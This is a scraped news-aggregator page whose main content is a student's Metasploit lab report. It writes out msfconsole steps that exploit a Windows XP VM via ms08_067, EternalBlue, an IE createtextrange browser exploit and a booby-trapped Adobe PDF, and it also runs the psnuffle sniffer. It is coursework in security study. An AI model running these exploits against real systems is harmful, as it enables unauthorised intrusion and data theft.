最新要闻
- 环球微资讯!“世界上最难修的铁路”:青藏铁路将开行复兴号
- 西湖景区通报1500元打捞手机、日入一万:竟是自导自演-世界热点评
- 【全球聚看点】SK海力士中国工厂增产“落后”工艺:内存还要降价15%!
- 快资讯:日均充电车辆8700台次 湖南高速服务区护航“五一”绿色出行
- 关注特殊群体,市图书馆举办花园读书会活动_当前热闻
- 工资涨幅不到去年一半!三星员工威胁:或将发动历史性罢工-重点聚焦
- 暴雪游戏停服一百天:提交退款申请截至6月30日
- 巴西媒体人:全球对美国货币政策不满与日俱增 美元国际吸引力大幅降低
- 国产AI和ChatGPT的差距有多大?李彦宏:有可能能赶上 也有可能一直追不上 焦点资讯
- 为什么火锅里的金针菇叫“明天见”?了解一下几丁质 天天热头条
- 对标ChatGPT!李彦宏:文心一言已完成4次技术升级 大模型推理性能已提升近10倍
- 华众车载(06830)获北汽奔驰新能源车产品订单 预测销售额约9亿元|世界今日讯
- 史上最大员工福利!京东60亿建4000套员工公寓:可拎包入住 租金约为市场价格一半 环球即时
- 环球聚焦:00后幼师回应唱挖呀挖呀走红:揭秘为何“挖呀挖呀”能魔性洗脑全网
- 人民网评婆孙平移插队、表情包恶搞事件:不能滑向违法边缘 世界视点
- 全球快讯:浙江省政协党组成员、副主席朱从玖接受审查调查
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
环球新资讯:Exp6 MSF应用基础
- 一、实践内容
- 二、实践过程
- (一)创建靶机
- (二)一个主动攻击实践
- 1. 利用ms08_067漏洞攻击Windows XP
- 2.利用ms17_010_eternalblue漏洞攻击Windows
- (三)一个针对浏览器的攻击
- 1.利用ms06_013_createtextrange漏洞攻击Windows XP SP3的IE浏览器
- (1)设计攻击模块及参数
- 1.利用ms06_013_createtextrange漏洞攻击Windows XP SP3的IE浏览器
- (四)一个针对客户端的攻击
- 1.Adobe
- (五)成功应用一个辅助模块
- 1.sniffer嗅探
- 三、遇到的问题
- 四、实践问题回答
- 五、离实践还缺什么技术或步骤
- 六、实践心得体会
一、实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
(资料图片仅供参考)
1.1 一个主动攻击实践,尽量使用最新的类似漏洞; (1分)
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)
1.4 成功应用任何一个辅助模块。(1分)
二、实践过程
(一)创建靶机
将windows XP作为靶机
按https://blog.csdn.net/linxinfa/article/details/112768896创建好靶机后,配置共享文件夹
xp系统打开cmd,再输入ipconfig指令查看其IP。
xp:192.168.136.132kali:192.168.136.129
查看两台主机网络是否互通,互ping发现网络是互通的。
(二)一个主动攻击实践
1. 利用ms08_067漏洞攻击Windows XP
攻击者试探靶机是否存在此漏洞 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.136.132
存在漏洞信息。
启动 msfconsole
,输入search ms08_067
查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi
输入info exploit/windows/smb/ms08_067_netapi查看模块具体的信息。
use exploit/windows/smb/ms08_067_netapi//选择使用的渗透模块set payload generic/shell_reverse_tcp //使用的payloadset RHOSTS 192.168.136.132 //设置靶机IPexploit
结果是能够发现靶机的型号,但无法建立连接。显示渗透已完成,但没有建立会话。
2.利用ms17_010_eternalblue漏洞攻击Windows
选择auxiliary的scanner扫描功能,检测靶机是否存在smb_ms17_010的漏洞。
发现
对靶机进行攻击
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcpset RHOSTS 192.168.136.132 靶机IP //设置靶机IPexploit
获得shell,输入ipconfig
和dir
成功运行
(三)一个针对浏览器的攻击
1.利用ms06_013_createtextrange漏洞攻击Windows XP SP3的IE浏览器
(1)设计攻击模块及参数
use exploit/windows/browser/ms06_013_createtextrange //选择使用exploit漏洞set payload windows/meterpreter/reverse_tcp //选择payloadshow options //查看所需调的参数exploit //开始攻击
在XP的IE浏览器打开http://192.168.136.129:8080/krNzcum浏览器开始从0-100计时。
(四)一个针对客户端的攻击
1.Adobe
msfconsole //进入控制台search adobe //搜索与adobe有关的漏洞use windows/fileformat/adobe_cooltype_sing //选择使用此漏洞set payload windows/meterpreter/bind_tcp //选择攻击载荷show options //查看需要配置的参数选项set LPORT 1315 //设置端口号set RHOST 192.168.136.132 //设置靶机IP地址set FILENAME lzq.pdf //设置生成的PDF文件名exploit //生成.pdf文件
将生成的PDF文件复制到XP虚拟机中
在kali中开启监听
use exploit/multi/handler //进入监听模块set payload windows/meterpreter/bind_tcp //选择攻击载荷show options //查看需要配置的参数选项set LPORT 1315 //设置端口号set RHOST 192.168.136.132 //设置靶机IP地址exploit //开启监听
在靶机中使用Adobe Reader打开pdf
攻击成功
(五)成功应用一个辅助模块
1.sniffer嗅探
在kali的msfconsole中输入以下代码
嗅探:可以获取网络上流经的数据包。
use auxiliary/sniffer/psnuffle //选择攻击操作show optionsexploit
在靶机上访问IE浏览器,即被嗅探到。
三、遇到的问题
创建共享文件夹时找不到选择的文件夹
重新安装VMware Tools解决
四、实践问题回答
用自己的话解释什么 是exploit,payload,encode。
简单地说,exploit是利用系统或软件中的漏洞的一段代码或技术。它通常用于获得对系统的未经授权的访问或控制。
payload是攻击中实际执行所需操作的部分,例如执行命令或下载文件。它本质上是交付给目标系统的“有效载荷”。
encode是指将数据转换为特定格式或表示的过程。在利用和有效负载的上下文中,编码通常用于混淆有效负载,使其更难以检测或分析。这可以使用各种编码技术来实现,比如base64编码。
总之,exploit是利用漏洞的方法,payload是执行所需操作的实际代码,encode是用于混淆有效负载的技术。
五、离实践还缺什么技术或步骤
经过这次实践,将病毒和后门程序真正展现起作用才是最重要的,我们需要利用社会工程学,引诱被攻击用户在靶机上打开对应的文件或链接。搜集靶机的漏洞信息至关重要,只有搜集到了其主机存在的漏洞才能进行下一步的攻击。除此之外,自己还需要加强解决问题和随机应变分析问题的能力,做到心中有数。
六、实践心得体会
在本次实验前,我们已经使用过多次msf,但这是第一次系统地学习使用方法。通过本次实验,进一步了解了msf平台能够实现的恶意攻击行为,了解了多个模块对应实现的功能,对exploit和payload有了更进一步的理解。我逐渐学会了展开攻击的一个具体思路,在以后的实践中还要多加练习。
关键词:
环球新资讯:Exp6 MSF应用基础
环球微资讯!“世界上最难修的铁路”:青藏铁路将开行复兴号
西湖景区通报1500元打捞手机、日入一万:竟是自导自演-世界热点评
【全球聚看点】SK海力士中国工厂增产“落后”工艺:内存还要降价15%!
快资讯:日均充电车辆8700台次 湖南高速服务区护航“五一”绿色出行
cryptohack wp day(1)
关注特殊群体,市图书馆举办花园读书会活动_当前热闻
工资涨幅不到去年一半!三星员工威胁:或将发动历史性罢工-重点聚焦
暴雪游戏停服一百天:提交退款申请截至6月30日
世界观热点:Java 双指针项目中的实际应用
全球新动态:84.范围for
巴西媒体人:全球对美国货币政策不满与日俱增 美元国际吸引力大幅降低
热消息:【新华解读】2022年保险业风险可控 未来应提升自身“造血”能力
国产AI和ChatGPT的差距有多大?李彦宏:有可能能赶上 也有可能一直追不上 焦点资讯
为什么火锅里的金针菇叫“明天见”?了解一下几丁质 天天热头条
对标ChatGPT!李彦宏:文心一言已完成4次技术升级 大模型推理性能已提升近10倍
世界观察:vscode使用git推送代码
MarkDown学习
基于YOLOv4的目标检测系统(附MATLAB代码+GUI实现)
Java练手项目(尚硅谷的),不涉及框架,数据库等。
世界短讯!Python教程_编程入门自学教程_菜鸟教程-免费教程分享
华众车载(06830)获北汽奔驰新能源车产品订单 预测销售额约9亿元|世界今日讯
史上最大员工福利!京东60亿建4000套员工公寓:可拎包入住 租金约为市场价格一半 环球即时
环球聚焦:00后幼师回应唱挖呀挖呀走红:揭秘为何“挖呀挖呀”能魔性洗脑全网
人民网评婆孙平移插队、表情包恶搞事件:不能滑向违法边缘 世界视点
全球快讯:浙江省政协党组成员、副主席朱从玖接受审查调查
商场举办躺平大赛3人分万元奖金,160多人报名参加
天天微资讯!劳斯莱斯史上最畅的销敞篷车没了 劳斯莱斯耀影正式停产
安徽一地惊现“海市蜃楼”奇观:持续约7分钟!
山东招远文旅局出奇招:单手拿起50斤金砖就送 价值1000多万-环球新视野
阵容完备——全新路虎·卫士130|CAR REVIEWS
记录-对象有哪些继承方式_信息
天天实时:ios app真机测试到上架App Store详细教程-必看
ubuntu编译kernel
三、词法分析
焦点速讯:五一期间 市公交公司安全运送乘客48万余人次
微信2023五一大数据来了!十大景区花钱榜公布 你花了多少钱? 观焦点
《流浪地球》剧情成真!科学家首次观测到一颗行星被恒星吞噬 世界热门
每日观点:今年还有调休假:中秋国庆假期后要连上7天班!
全球新消息丨最新研究:外星人或利用手机信号绘制出地球地图
震撼!恒星吞噬行星全过程首次曝光 地球:我命休矣?
博客开通
【解决方法】解决锐捷EVE模拟器无法弹出选择CRT接管命令行和命令行 天天简讯
用例管理工具 禅道-当前速看
Web前端已死?别带节奏了,说白了就是“卷”
林志玲出席活动被问二胎做出回应称自己不会要二胎,一个就满足了
财政部:2023年中央财政继续支持实施并启动新的农村综合性改革试点试验
世界快看:电动车降价彻底无望?今日电池级碳酸锂涨价5000元/吨
骁龙8+待机47.9天如何实现?小米平板6系列“深度休眠”官方揭秘
【世界新视野】多样性算力推委会正式成立,透露哪些重要信号?
五一假期,江门水路发送旅客超15万人次 世界快报
TypeScript 学习笔记 — 模板字符串和类型体操(十五) 当前头条
天天日报丨(转载)性能测试应该怎么做?
在Zynq平台上使用uCOS [原创www.cnblogs.com/helesheng]-天天热文
ChatExcel?|焦点信息
全球讯息:【手记】翻新显卡安装驱动程序
信息:2022年跨境电商市场规模15.7万亿元
【新华500】新华500指数(989001)4日收涨0.05% 环球即时
新华社权威快报丨2023年“五一”假期全国营业性客运量合计26971.6万人次
【环球时快讯】6499元买吗?雷军晒小米13 Ultra限量定制色真机上手图:网友大呼背刺
家用强力灭蚊!雅格充电电蚊拍10.9元起狂促_报资讯
世界聚焦:“五一”假期日均125.3万人次出入境
报道:我设计了个【方案】:比redis好10倍的kv库【一统kv】
Apache Pulsar 在火山引擎 EMR 的集成与场景
PA 2022 部分题解_环球热门
ios app真机测试到上架App Store详细教程-必看 快播
奈雪五一小长假订单同比上涨120% 部分门店涨幅超800%|热资讯
【天天热闻】五一18人预付9600元订民宿遭毁约!青岛市监局立案调查
环球视讯!4月百城二手住宅价格跌幅扩大:挂牌量持续走高 房价走势承压
Hadoop运行集群搭建-世界速读
golang基础知识 环球快讯
聚焦:用手机号码归属地 API 开发的应用推荐
环球快资讯丨来了乌鲁木齐,相当于去了中东石油富豪区消费?
全面看齐新7系!宝马新一代5系G60外观、内饰首度公开亮相:发光双肾抢眼-全球速讯
门密码锁怎么加入指纹?第一次使用记住这4点 环球讯息
让Visual Studio用上chatgpt
【解决方法】白嫖利用WPS自带C盘清理大师,清理C盘空间,自测清理19.5G空间,太感人了! 当前快播
Linux安装部署Redis(超级详细)-全球看热讯
博安生物(6955.HK):地舒单抗注射液国际3期临床试验完成首例受试者入组|今日视点
纤薄身材也能满血发挥!耕升RTX 4070踏雪评测:2K游戏通吃的高颜值显卡 环球关注
购燃油车就送粤A蓝牌!广汽集团在广州推限时购车补贴
看不下去AI胡说八道 英伟达出手给大模型安了个“护栏”
世界通讯!鼠目寸光是什么生肖_鼠目寸光的意思及造句
世界微资讯!热门的常用 API 大全分享
观速讯丨Spring AOP官方文档学习笔记(三)之基于xml的Spring AOP
播报:常见未授权访问漏洞汇总
每日播报!AD主辅域控切换-辅域控制器升级为主域控制器-详细操作
Excel文件根据自定义模板生成标签或数据报表
2023山东东营市广饶县事业单位招聘面试通知书领取通知
u18包括18岁吗?足球比赛中的u系列是什么意思?
英雄联盟150位英雄名字是什么?2022lpl夏季赛赛程表
iphone手机看电子书能用什么格式?iphone电子书APP推荐
NBA 2K14存档文件在哪里?nba2k14电脑版键盘操作
十全食美多种零食 奥利奥大礼包39元1.6斤再发车
不涨价!小米13 Ultra限量定制色上架:16+512GB售价6499元
仙气飘飘 洛阳90后女生穿汉服开公交:展示传统文化之美
观察:发布整整10年后:第一代iPad Air被正式抛弃
刺客信条系列中哪个最好玩?刺客信条奥德赛选男还是女?
阿迪达斯官网买的产品是正品吗?阿迪达斯和耐克是什么关系?
承重墙允许开洞最大尺寸是多少?承重墙拆了要承担什么责任?